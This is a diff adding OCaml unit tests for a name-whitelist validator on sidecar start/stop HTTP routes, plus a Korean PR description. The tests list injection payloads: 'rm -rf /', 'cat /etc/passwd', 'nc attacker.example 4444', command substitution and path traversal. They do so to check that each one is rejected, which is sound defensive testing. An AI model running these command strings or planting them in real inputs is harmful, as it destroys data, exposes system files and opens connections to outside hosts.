       ( "invariants",
         [

--- a/test/test_sidecar_lifecycle_routes.ml
+++ b/test/test_sidecar_lifecycle_routes.ml
@@ -1,0 +1,101 @@
+(** Negative-path tests for /api/v1/sidecar/* routes.
+
+    The HTTP layer is a thin wrapper around [validate_name] + a shell-out
+    to the sidecar [run.sh]. The thing worth pinning is that any
+    not-whitelisted [name=] short-circuits at [validate_name] BEFORE the
+    code reaches [Sys.command] or [Process_eio.run_argv_with_status].
+
+    Source of truth for endpoint design: docs/SIDECAR-LIFECYCLE-API-RFC.md.
+*)
+
+open Alcotest
+
+module Routes = Masc_mcp.Server_routes_http_routes_sidecar
+
+let result_of = function
+  | Ok s -> "Ok " ^ s
+  | Error e -> "Error " ^ e
+
+let result_t = testable (Fmt.of_to_string result_of) ( = )
+
+let validate name = Routes.validate_name name
+
+(* ---- Happy path: every known sidecar id is accepted verbatim. ---- *)
+
+let test_validate_accepts_each_known_id () =
+  List.iter (fun id ->
+    check result_t (Printf.sprintf "id %s is accepted" id) (Ok id) (validate (Some id))
+  ) Routes.known_ids
+
+(* ---- Whitelist enforcement. ---- *)
+
+let test_validate_rejects_none () =
+  check result_t "missing name → error"
+    (Error "missing 'name' query parameter")
+    (validate None)
+
+let test_validate_rejects_unknown_id () =
+  check result_t "wholly unknown id rejected"
+    (Error "unknown sidecar id: facebook")
+    (validate (Some "facebook"))
+
+(* ---- Injection attempts: the only thing that matters is that an attacker-
+       controlled string never falls through to Sys.command. The error message
+       carries the raw input back, but the Result is Error, so handle_start /
+       handle_stop short-circuit before any subprocess. ---- *)
+
+let test_validate_rejects_shell_meta () =
+  let payloads = [
+    "discord;rm -rf /";
+    "discord && cat /etc/passwd";
+    "discord$(id)";
+    "discord`whoami`";
+    "discord|nc attacker.example 4444";
+    "discord\nimessage";
+  ] in
+  List.iter (fun p ->
+    match validate (Some p) with
+    | Ok _ -> failf "shell-meta payload %S unexpectedly accepted" p
+    | Error _ -> ()
+  ) payloads
+
+let test_validate_rejects_path_traversal () =
+  let payloads = [
+    "../../etc/passwd";
+    "discord/../slack";
+    "./discord";
+    "/discord";
+    "";
+    "   ";
+  ] in
+  List.iter (fun p ->
+    match validate (Some p) with
+    | Ok _ -> failf "path-traversal payload %S unexpectedly accepted" p
+    | Error _ -> ()
+  ) payloads
+
+(* ---- Whitelist size invariant. The dashboard mirrors this list as
+       KNOWN_CONNECTOR_IDS in connector-status.ts; if a fifth bridge is
+       added without updating both, the dashboard will draw a card the
+       backend refuses to spawn. ---- *)
+
+let test_known_ids_size_matches_dashboard () =
+  check int "exactly 4 known sidecars (matches dashboard KNOWN_CONNECTOR_IDS)"
+    4 (List.length Routes.known_ids)
+
+let () =
+  run "sidecar_lifecycle_routes"
+    [
+      ( "validate_name",
+        [
+          test_case "accepts every known id" `Quick test_validate_accepts_each_known_id;
+          test_case "rejects None"           `Quick test_validate_rejects_none;
+          test_case "rejects unknown id"     `Quick test_validate_rejects_unknown_id;
+          test_case "rejects shell meta"     `Quick test_validate_rejects_shell_meta;
+          test_case "rejects path traversal" `Quick test_validate_rejects_path_traversal;
+        ] );
+      ( "invariants",
+        [
+          test_case "known_ids size = 4" `Quick test_known_ids_size_matches_dashboard;
+        ] );
+    ]


### PR DESCRIPTION
## 변경
대시보드 connector 운영 surface가 sidecar를 직접 시작/정지/조회할 수 있도록 4 endpoint 추가. RFC: `docs/SIDECAR-LIFECYCLE-API-RFC.md` (PR #7826).

| Method | Path | Auth | 동작 |
|--------|------|------|------|
| GET | `/api/v1/sidecar/status` | public_read | `.gate/runtime/<id>/status.json` 반환 |
| GET | `/api/v1/sidecar/logs?lines=N` | tool_auth(\"sidecar\") | 오늘 로그 tail (1≤N≤1000, default 200) |
| POST | `/api/v1/sidecar/start` | tool_auth(\"sidecar\") | `setsid nohup run.sh start` detach |
| POST | `/api/v1/sidecar/stop` | tool_auth(\"sidecar\") | `run.sh stop` 후 \"Sent SIGTERM\" 마커 확인 |

## 보안
- `validate_name`이 `?name=` 입력을 화이트리스트(`[discord;imessage;slack;telegram]`)로 단축회로 → `Sys.command`/`Process_eio`에 attacker-controlled 문자열 도달 불가
- `clamp_lines`가 `?lines=` 를 [1, 1000] 범위로 제한
- shell-meta(`;`, `&&`, backtick, pipe, newline) 6종 + path-traversal(`../`, `./`, 절대경로, 공백) 6종 payload 거부 단위 테스트

## 검증
`test/test_sidecar_lifecycle_routes.ml`: validate_name 5 tests + clamp_lines 4 tests + invariants(known_ids size = 4) 1 test = 10 alcotest cases.